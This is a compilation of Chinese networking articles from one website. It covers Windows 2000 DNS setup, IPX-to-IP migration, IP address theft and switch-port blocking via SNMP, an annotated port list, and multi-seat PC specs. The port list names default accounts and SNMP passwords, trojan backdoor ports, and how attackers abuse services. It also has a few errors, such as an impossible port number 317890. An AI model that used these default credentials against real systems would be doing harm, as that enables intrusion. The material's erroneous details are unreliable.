5.5.4 Windows 2000Professional 的 DNS 设置
    打开网络和拨号连接双击本地连接，单击属性选择 Internet 协议（TCP/IP）然后选择属性，如果在 DHCP 服务中设置了 DNS 的信息则在对话框中选择"自动获得 DNS 服务器地址"选项并分别在首选 DNS 服务器和备用 DNS 服务器中填写主 DNS 服务器和辅助 DNS 服务器的 IP 地址如图 5.22

如果需要进一步设置客户机的 DNS 属性，则单击"高级"按钮选择 DNS 标签如图 5.23，如果选择"搜索主 DNS 和每一个连接的 DNS 域"表示在搜索一个不标准的域名称时只能在父域中搜索，如果父域中搜索不到该域名则将此结果返回；如果选择"搜索这些 DNS 域"选项则在搜索域名称时首选在列表中的服务器上搜索，如果搜索不到结果则在其它域中进行搜索。
    "在 DNS 注册此连接的地址、在 DNS 中注册此连接的域名"这两个选项用于在 Win2000 环境中在登录时将客户机的 IP 地址及域名注册到 DNS 服务器中。
    在 DNS 服务器和客户机的设置完成后用户可以利用 IPCONFIG、PING、NSLOOKUP 三个命令测试 DNS 服务器的设置是否正确.具体使用，请参看 Windows 2000 Server 中相应文档。

返回


www.163164.com IPX如何向IP迁移 QQ 3149886

双击滚屏 单击停止

IPX如何向IP迁移

Novell公司最新推出的NetWare5网络操作系统终于也顺应潮流，走到了IP的统一轨道上来。纯粹IP的协议环境明显可以大大简化路由器的协议管理。

现在大家都在面临着从IPX迁移到IP的问题。在进行IPX到IP迁移之前应三思而行。例如，你应该考虑是否准备全部网络都转换为IP，如果仅仅要去掉主干网上的IPX，那么只需对服务器进行改造就可以了。

■迁移前做好准备

首先看看你网络上的应用是否依赖于IPX。例如，Novell的RCONSOLE必须使用IPX／SPX和服务器通信。MA（迁移代理）可以使RCONSOLE运行在IP网上。如果要一个纯IP网络，必须使用NetWare5提供的使用IP的Java版RCONSOLE。确定一个应用是否依赖IPX并非易事。如果一个应用使用SAP（服务广播协议）或Bindery扫描来定位服务的话，它可能不处在一个纯IP环境。如果一个应用只使用NCP（NetWare核心协议）与服务器通信的话，它应能在纯IP环境下工作。

你还应考虑你的打印环境。如果你网上的打印机不支持TCP／IP，一般使用一个程序将打印作业用LPR协议送到打印机，客户端的工作站直接使用LPR打印。如果工作站上没有LPR客户软件，你可以安装用于NetWare的UNIX打印服务，或者移到你的NetWare服务器上使用NDPS2（Novell分布式打印服务）。

最后，你还需要考虑网络的基础结构。看看路由器是否支持IP多点广播。在一个全部是TCP／IP的网络中，NetWare5使用SLP（服务定位协议）来定位服务。基于RFC2165的SLP使用广播来发现SLP，并使用SLP代理和服务。 表1　不同情况下的迁移策略
客户端
骨干协议
是否可与IPX通信
是否可与IP通信

IP only
IP
○
●

IP兼容模式
IP
●(加上迁移代理)
●

Dual Stack(IPX和IP)
IP or IPX
●
●

IPX only
IPX
●
●(加上迁移代理)

注： ●是 ○否

■带宽不能白白浪费

在IPX世界中，客户机和服务器使用SAP广播来相互定位。提供服务的设备每分钟在网络上广播一下自己，NetWare服务器收集这些信息供客户端查询使用。在一个大规模的网络中，这种广播将占有十分可观的带宽。有了SLP，提供服务的设备可在网上的SA（服务代理）上注册，并定期更新。SA将这些信息提供给问询的客户机。SA更新的频率缺省设置为3小时一次，远低于SAP的更新频率。

此外，大型网络使用DA（目录代理）。DA将多个SA的SLP信息混集在一起以便客户机和SA有一个统一的地方查询信息。Novell的DA将信息存放在NDS中。

如果网络上没有DA，客户机只能问询多个SA才能定位一个服务。有几种方法可以定位SLPSA。如果网络支持IP多点广播的话，客户端可以通过它来定位SA，或者，客户端的许多静态设置提供SA的所在位置。如果DHCP服务器支持SA的话，你可设置DHCP选项来发送SA位置信息。

■不一定全部抛弃IPX

IP兼容模式在迁移策略中有一定作用。在NetWare服务器上，该驱动为SCMDNLM。在客户机上，通过选择“具有兼容模式的IP”即可安装该兼容模式驱动。SCMD驱动接收IPX通信请求并将其转换成IP包。

为了使IPX客户机和IP客户机互相通信，MA必不可少。MA包含在SCMDNLM，但必须使用／g选项启动它，或者对ServicePack1用户，使用／bs（主干支持）选项。

当MA设置中装载了SCMDNLM后，它就创建一个虚拟IPX网络。MA使用该虚拟网络来完成IPX到IP的路由。MA也可使NetWare4．X服务器和只使用IP的NetWare5通信。

图1如何构造虚拟IPX网络

图1（通过MA实现虚拟IPX网络）显示了SCMD是如何工作的。在MA模式下的SCMDNLM建立一个虚拟IPX，这样IPX客户机及任何与其通信的IP设备好像在一个虚拟IPX网络中。当IPX客户机要和IP端的设备通信时，SCMD就提供了IP网络之间的路由。MA可使IPX客户机跨越只有IP的主干网相互通信。但是如果MA放置不当的话，会大大降低路由的效率。例如，图2的“低效的路由”，MA1和MA2与路由器之间只有1Hop的距离。但Client1通过MA1到达Client3要经过3个路由器，而不是1个路由器。如果MA1跨越广域网问题就更加严重。在网段A放一个MA就会解决这个问题。

图2IPX向IP迁移后的低效路由情况

■最保险的迁移策略

是从服务器还是从客户机着手呢？这要看实际情况而定。如果只想去除主干网的IPX，下面的迁移计划可供参考：

1．明确接到主干网的所有网段；

2．在主干网边缘升级／安装一个或多个NetWare5服务器作为MA；

3．将任何主干网段上的客户机／服务器转换为纯IP协议；

4．关掉主干网的IPX路由。

如果想迁移整个网络，你可以从主干网迁移着手。或者你也可以从某一个分支网段开始。但不管怎样，主干网上必须安装一个或多个服务器用作MA，然后才能迁移其余的网络。

当你迁移某一部分网络时，下面的作法可作参考；

1．升级／安装服务器到NetWare并将其用作MA；

2．升级具有IPX和IP安装选项的其余服务器；

3．升级所有客户机为只有IP或具有兼容模式的IP；

4．关掉所有服务器的IPX；

5．关掉路由器的IPX。

不管用何种方法，将你的网络转换为全部IP环境不是一朝一夕之事。而是一个渐进的过程。

当在工作中安装客户软件时，注意Windows95／98／NT的NetWare客户软件允许几种协议栈的选择，所以必须决定哪种选择可适合具体情况，表1可以帮助用户做出决策。如果使用只有IP的选项，任何IPX的应用将无法运作。但当客户端为兼容模式时，IPX应用将其请求转换成IP来传输。

返回

当前版本：2006-11-28 www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！ 收藏本站


IP地址盗用常用方法及防范

《一键清理系统垃圾》

IP地址盗用常用方法及防范

目前IP地址盗用行为非常常见，许多“不法之徒”用盗用地址的行为来逃避追踪、隐藏自己的身份。IP地址的盗用行为侵害了网络正常用户的权益，并且给网络安全、网络的正常运行带来了巨大的负面影响，因此研究IP地址盗用的问题，找出有效的防范措施，是当前的一个紧迫课题。

    IP地址盗用常用的方法及其防范机制

    IP地址盗用是指盗用者使用未经授权的IP地址来配置网上的计算机。IP地址的盗用通常有以下两种方法:

    一是单纯修改IP地址的盗用方法。如果用户在配置或修改配置时，使用的不是合法获得的IP地址，就形成了IP地址盗用。由于IP地址是一个协议逻辑地址，是一个需要用户设置并随时修改的值，因此无法限制用户修改本机的IP地址。

    二是同时修改IP-MAC地址的方法。针对单纯修改IP地址的问题，很多单位都采用IP-MAC捆绑技术加以解决。但IP-MAC捆绑技术无法防止用户对IP-MAC的修改。MAC地址是网络设备的硬件地址，对于以太网来说，即俗称的网卡地址。每个网卡上的MAC地址在所有以太网设备中必须是惟一的，它由IEEE分配，固化在网卡上一般不得随意改动。但是，一些兼容网卡的MAC地址却可以通过配置程序来修改。如果将一台计算机的IP和MAC地址都修改为另一台合法主机对应的IP和MAC地址，那么IP-MAC捆绑技术就无能为力了。另外，对于一些MAC地址不能直接修改的网卡，用户还可以通过软件修改MAC地址，即通过修改底层网络软件达到欺骗上层软件的目的。

    目前发现IP地址盗用比较常用的方法是定期扫描网络各路由器的ARP(address resolution protocol)表，获得当前正在使用的IP地址以及IP-MAC对照关系，与合法的IP地址表，IP-MAC表对照，如果不一致则有非法访问行为发生。另外，从用户的故障报告(盗用正在使用的IP地址会出现MAC地址冲突的提示)也可以发现IP地址的盗用行为。在此基础上，常用的防范机制有:IP-MAC捆绑技术、代理服务器技术、IP-MAC-USER认证授权以及透明网关技术等。

    这些机制都有一定的局限性，比如IP-MAC捆绑技术用户管理十分困难;透明网关技术需要专门的机器进行数据转发，该机器容易成为瓶颈。更重要的是，这些机制都没有完全从根本上防止IP地址盗用行为所产生的危害，只是防止地址盗用者直接访问外部网络资源。事实上，由于IP地址盗用者仍然具有IP子网内完全活动的自由，因此一方面这种行为会干扰合法用户的使用:另一方面可能被不良企图者用来攻击子网内的其他机器和网络设备。如果子网内有代理服务器，盗用者还可以通过种种手段获得网外资源。

    利用端口定位及时阻断IP地址盗用

    交换机是局域网的主要网络设备，它工作在数据链路层上，基于MAC地址来转发和过滤数据包。因此，每个交换机均维护着一个与端口对应的MAC地址表。任何与交换机直接相连或处于同一广播域的主机的MAC地址均会被保存到交换机的MAC地址表中。通过SNMP(Simple Network Management protocol)管理站与各个交换机的SNMP代理通信可以获取每个交换机保存的与端口对应的MAC地址表，从而形成一个实时的Switch-Port-MAC对应表。将实时获得的Switch-Port-MAC对应表与事先获得的合法的完整表格对照，就可以快速发现交换机端口是否出现非法MAC地址，进一步即可判定是否有IP地址盗用的发生。如果同一个MAC地址同时出现在不同的交换机的非级联端口上，则意味着IP-MAC成对盗用。

    发现了地址盗用行为后，实际上也已经将盗用行为定位到了交换机的端口。再通过查询事先建立的完整的Switch-Port-MAC对应表，就可以立即定位到发生盗用行为的房间。

    发生了地址盗用行为后，可以立即采取相应的方法来阻断盗用行为所产生的影响，技术上可以通过SNMP管理站向交换机代理发出一个SNMP消息来关断发生盗用行为的端口，这样盗用IP地址的机器无法与网络中其他机器发生任何联系，当然也无法影响其他机器的正常运行。

    端口的关断可以通过改变其管理状态来实现。在MIB(Management Information Base)中有一个代表端口管理状态的可读写对象ifAdminStatus(对象标识符号为1.3.6.1.2.1.2.2.1.7)，给ifAdminStatus赋不同的值，可以改变端口的管理状态，即“1”—开启端口，“2”—关闭端口，“3”—供测试用。

    这样，通过管理站给交换机发送赋值信息(Set Request)，就可以关闭和开启相应的端口，比如要关闭某一交换机(192.168.1.1)的2号端口，可以向该交换机发出如下信息:

    set("private" 192.168.1.1 1.3.6.1，2.1.2.2.1.7.2.0.2).

    结合IP-MAC绑定技术，通过交换机端口管理，可以在实际使用中迅速发现并阻断IP地址的盗用行为，尤其是解决了IP-MAC成对盗用的问题，同时也不影响网络的运行效率。


IP地址盗用技术简介以及防范措施综述

《一键清理系统垃圾》

IP地址盗用技术简介以及防范措施综述

  一、IP地址盗用方法分析

    IP地址的盗用方法多种多样，其常用方法主要有以下几种：

    1、静态修改IP地址

    对于任何一个TCP/IP实现来 说，IP地址都是其用户配置的必选项。如果用户在配置TCP/IP或修改TCP/IP配置时，使用的不是授权机构分配的IP地址，就形成了IP地址盗用。由于IP地址是一个逻辑地址，是一个需要用户设置的值，因此无法限制用户对于IP地址的静态修改，除非使用DHCP服务器分配IP地址，但又会带来其它管理问题。

    2、成对修改IP-MAC地址

    对于静态修改IP地址的问题，现在很多单位都采用静态路由技术加以解决。针对静态路由技术，IP盗用技术又有了新的发展，即成对修改IP-MAC地址。MAC地址是设备的硬件地址，对于我们常用的以太网来说，即俗称的计算机网卡地址。每一个网卡的MAC地址在所有以太网设备中必须是唯一的，它由IEEE分配，是固化在网卡上的，一般不能随意改动。但是，现在的一些兼容网卡，其MAC地址可以使用网卡配置程序进行修改。如果将一台计算机的IP地址和MAC地址都改为另外一台合法主机的IP地址和MAC地址，那静态路由技术就无能为力了。

    另外，对于那些MAC地址不能直接修改的网卡来说，用户还可以采用软件的办法来修改MAC地址，即通过修改底层网络软件达到欺骗上层网络软件的目的。

    3、动态修改IP地址

    对于一些黑客高手来说，直接编写程序在网络上收发数据包，绕过上层网络软件，动态修改自己的IP地址(或IP-MAC地址对)，达到IP欺骗并不是一件很困难的事。

二、防范技术

    针对IP盗用问题，网络专家采用了各种防范技术，现在比较通常的防范技术主要是根据TCP/IP的层次结构，在不同的层次采用不同的方法来防止IP地址的盗用。

    1、交换机控制

    解决IP地址的最彻底的方法是使用交换机进行控制，即在TCP/IP第二层进行控制：使用交换机提供的端口的单地址工作模式，即交换机的每一个端口只允许一台主机通过该端口访问网络，任何其它地址的主机的访问被拒绝。但此方案的最大缺点在于它需要网络上全部采用交换机提供用户接入，这在交换机相对昂贵的今天不是一个能够普遍采用的解决方案。

    2、路由器隔离

    采用路由器隔离的办法其主要依据是MAC地址作为以太网卡地址全球唯一不能改变。其实现方法为通过SNMP协议定期扫描校园网各路由器的ARP表，获得当前IP和MAC的对照关系，和事先合法的IP和MAC地址比较，如不一致，则为非法访问。对于非法访问，有几种办法可以制止，如：

    a.使用正确的IP与MAC地址映射覆盖非法的IP-MAC表项；

    b.向非法访问的主机发送ICMP不可达的欺骗包，干扰其数据发送；

    c.修改路由器的存取控制列表，禁止非法访问。

    路由器隔离的另外一种实现方法是使用静态ARP表，即路由器中IP与MAC地址的映射不通过ARP来获得，而采用静态设置。这样，当非法访问的IP地址和MAC地址不一致时，路由器根据正确的静态设置转发的帧就不会到达非法主机。

    路由器隔离技术能够较好地解决IP地址的盗用问题，但是如果非法用户针对其理论依据进行破坏，成对修改IP-MAC地址，对这样的IP地址盗用它就无能为力了。

    3、防火墙与代理服务器

    使用防火墙与代理服务器相结合，也能较好地解决IP地址盗用问题：防火墙用来隔离内部网络和外部网络，用户访问外部网络通过代理服务器进行。使用这样的办法是将IP防盗放到应用层来解决，变IP管理为用户身份和口令的管理，因为用户对于网络的使用归根结底是要使用网络应用。这样实现的好处是，盗用IP地址只能在子网内使用，失去盗用的意义；合法用户可以选择任意一台IP主机使用，通过代理服务器访问外部网络资源，而无权用户即使盗用IP，也没有身份和密码，不能使用外部网络。

    使用防火墙和代理服务器的缺点也是明显的，由于使用代理服务器访问外部网络对用户不是透明的，增加了用户操作的麻烦；另外，对于大数量的用户群(如高校的学生)来说，用户管理也是一个问题。

作者：
来源：天极yesky


IP端口对照表(中文注释)

《一键清理系统垃圾》

IP端口对照表(中文注释)

0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

7 Echo 你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。

常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个机器的UDP数据包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen）

另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。

Harvest/squid cache将从3130端口发送UDP echo：“如果将cache的source_ping on选项打开，它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat 这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似

再说一遍：ICMP没有端口，ICMP port 11通常是ICMP type=11

19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时，会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。

21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口运行ssh）

还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。

UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632（十六进制的0x1600）位交换后是0x0016（使进制的22）。

23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术，入侵者会找到密码。

25 smtp 攻击者（spammer）寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地址。SMTP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。

53 DNS Hacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其它通讯。因此防火墙常常过滤或记录53端口。

需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

67和68 Bootp和DHCP UDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”（man-in-middle）攻击。客户端向68端口（bootps）广播请求配置，服务器向67端口（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

69 TFTP(UDP)　 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文件。

79 finger Hacker用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root，信任局域网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）

109 POP2 并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入系统）。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有：rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。

记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth 这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端口的连接请求。记住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST，着将回停止这一缓慢的连接。

119 NNTP news　 新闻组传输协议，承载USENET通讯。当你链接到诸如：news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如：这个机器上运行Exchange Server吗？是什么版本？

这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息，请仔细阅读文章后面的NetBIOS一节

139 NetBIOS
File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

大量针对这一端口始于1999，后来逐渐变少。2000年又有回升。一些VBS（IE5 VisualBasic Scripting）开始将它们自己拷贝到这个端口，试图在这个端口繁殖。

143 IMAP 和上面POP3的安全问题一样，许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住：一种Linux蠕虫（admw0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后，这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。

这一端口还被用于IMAP2，但并不流行。

已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP)　入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中，通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。

SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名，你会看见这种包在子网内广播（cable modem, DSL）查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台， 它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

553 CORBA
IIOP (UDP) 如果你使用cable modem或DSL VLAN，你将会看到这个端口的广播。CORBA是一种面向对象的RPC（remote procedure call）系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口

一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的，但基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住，mountd可运行于任何端口（到底在哪个端口，需要在端口111做portmap查询），只是Linux默认为635端口，就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络，它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点，你可以重启机器，打开Telnet，再打开一个窗口运行“natstat -a”，你将会看到Telnet被分配1024端口。请求的程序越多，动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍，当你浏览Web页时用“netstat”查看，每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS
这一协议以管道方式穿过防火墙，允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置，它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机，从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙，常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL
系统本身很少扫描这个端口，但常常是sscan脚本的一部分。

1243 Sub-7木马（TCP）

1524 ingreslock后门
许多攻击脚本将安装一个后门Shell于这个端口（尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本，如statd, ttdbserver和cmsd）。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图，很可能是上述原因。你可以试试Telnet到你的机器上的这个端口，看看它是否会给你一个Shell。连接到600/pcserver也存在这个问题。

2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口，但是大部分情况是安装后NFS运行于这个端口，Hacker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。你也会看到搜索其它代理服务器的端口：8000/8001/8080/8888。扫描这一端口的另一原因是：用户正在进入聊天室。其它用户（或服务器本身）也会检验这个端口以确定用户的机器是否支持代理。请查看5.3节。

5632 pcAnywere
你会看到很多这个端口的扫描，这依赖于你所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能得代理（译者：指agent而不是proxy）。Hacker/cracker也会寻找开放这种服务的机器，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过电话线控制另一台机器，而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时，他们将会看到持续的，在这个端口的连接企图。（译者：即看到防火墙报告这一端口的连接企图时，并不表示你已被Sub-7控制。）

6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。

13223 PowWow
PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户，从另一个聊天者手中“继承”了IP地址这种情况就会发生：好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验：阻断这一外向连接不会有任何问题，但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载：
机器会不断试图解析DNS名-ads.conducent.com，即IP地址216.33.210.40 ；216.33.199.77 ；216.33.199.80 ；216.33.199.81；216.33.210.41。（译者：不知NetAnts使用的Radiate是否也有这种现象）

27374 Sub-7木马(TCP)

30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/（译者：法语，译为中坚力量，精华。即3=E, 1=L, 7=T）。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少，其它的木马程序越来越流行。

31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马（RAT, Remote Access Trojan）。这种木马包含内置的31790端口扫描器，因此任何31789端口到317890端口的连接意味着已经有这种入侵。（31789端口是控制连接，317890端口是文件传输连接）

32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说：早期版本的Solaris（2.5.1之前）将portmapper置于这一范围内，即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper，就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包（且只在此范围之内）则可能是由于traceroute。参见traceroute部分。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


MMU 1对7系统标准

《一键清理系统垃圾》

MMU 1对7系统标准

    设备
标准
推荐
替代方案

    CPU
P4
P4 2.0
P4 1.8

    主板
USB 2.0接口

6个PCI插槽

内置网卡

内置声卡
微星i845GL
当前流行支

持P4的主板

    内存
512M 266Mhz
1G
512M

    硬盘
40G 7200RPM
40G 7200RPM
40G 7200RPM

    显卡AGP
64M显存

与MMU系统兼容芯片
nVidia Geforce2 MX 400
流行的64M显卡

    显卡PCI
16M显存

与MMU系统兼容芯片
Sis 305
中天 TNT2 32M 带风扇

    电源
300W
300W
300W

返回


MMU 系统FAQ

《一键清理系统垃圾》

MMU 系统FAQ

1.问题：在安装MCT MMU 2000/XP后Windows不再启动

原因/补救措施：

o.　　　 为了使Windows重新在第一位置运行，重新启动，并在启动过程中按下“F8”健。在那里可以从菜单中选择“安全模式”。现在Windows不以多位置操作模式启动，也就是说，现在只能通过开始－>控制面板－>添加/删除软件－>MCT 2000/XP方便地进行卸载/移除。接下来重新启动并测试，较新的MCT驱动程序是不是已经得到了补救，或者您的现有设备是否与MCT兼容

p.　　　 Windows可能没有安装正确的服务包（Service-Pack）。请（从CD上或者通过因特网）获得最新的Windows升级包（Service-Pack）或最新的MCT版本.

q.　　　 您所使用的Windows国家版本还没有经过制造商的发布，如果有这种情况，请和制造商联系，请参考联系一章的内容。

r.　　　　您的Windows版本与前提条件不符，可能您使用了较老的版本，如Windows NT 4.0、Windows 98/ME等不支持的版本。

2.问题：屏幕无法正确显示

原因/补救措施：

h.　　　 屏幕刷新频率不合适。通过控制面板－>显示－>属性－>选项－>显示卡－>选择一种其它的模式，比如改变分辨率、刷新频率或者配色方案。

i.　　　　 尝试着将另外一台监视器连接到显示卡上进行测试，也许您可以使用第一位置上的显示器。

j.　　　　 使用另外一根VGA延长电缆。

k.　　　 如果在TFT屏幕上突然显示出条纹，则说明数字/模拟转换器工作不正常。使用另外一台监视器，或者在计算机的BIOS中提高PCI插槽的等待周期（等待状态）。

3.问题：附加工作位置不启动

原因/补救措施：

c.　　　 检查在Windows启动后是否显示附加位置的站号（在屏幕的的左上方）。如果没有显示的话，可能要使用最新的版本来安装多位置软件（请参考更新一章的内容）。检查是否已经正确连接了键盘、鼠标和监视器。

d.　　　 附加显示卡没有被识别出来。更换卡的插槽或者将其与监视器正确连接然后重新启动。通过：控制面板－>系统－>硬件－>设备管理器－>显示卡在Windows设备管理器中检查到底有没有安装附加显示卡。或者更换显示卡。

